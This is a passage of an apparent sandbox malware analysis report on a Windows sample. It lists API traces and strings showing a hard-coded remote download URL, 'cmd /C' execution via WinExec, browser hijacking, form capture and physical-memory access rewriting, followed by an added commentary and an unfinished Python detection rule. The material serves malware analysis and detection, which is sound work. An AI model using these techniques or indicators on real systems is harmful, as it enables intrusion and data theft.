                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                             Control-flow Graph (function at 004068B0; executed / not executed basic blocks; rendered graph not reproduced)
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
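The two records above belong together: function 00402822 resolves RtlInitUnicodeString, NtOpenSection, NtMapViewOfSection and NtUnmapViewOfSection from ntdll.dll by hand, and the function at 00402976 runs GetSecurityInfo / SetEntriesInAclA / SetSecurityInfo on a kernel object (object type 00000006 = SE_KERNEL_OBJECT) next to the string \device\physicalmemory. That is the old user-mode physical-memory technique: open the \Device\PhysicalMemory section, rewrite its DACL so the caller may map it writable, then map a view. User-mode opens of that section have been denied since Windows Server 2003 SP1, so on the Windows 10 image this analysis ran on the path cannot succeed; it remains a strong family indicator. The following added example is my own code, not part of this report or of the sample: it parses the report's own API bullet format and runs two rules over the two records, which are copied from this page verbatim as constructed input. The rule names and the "at least two section APIs" threshold are my choices.

```python
import re

# One Joe Sandbox "APIs" bullet, e.g.
#   • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
#   • GetVersion.KERNEL32 ref: 00402E22
#   • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,...), ref: 0040283A
API_LINE = re.compile(
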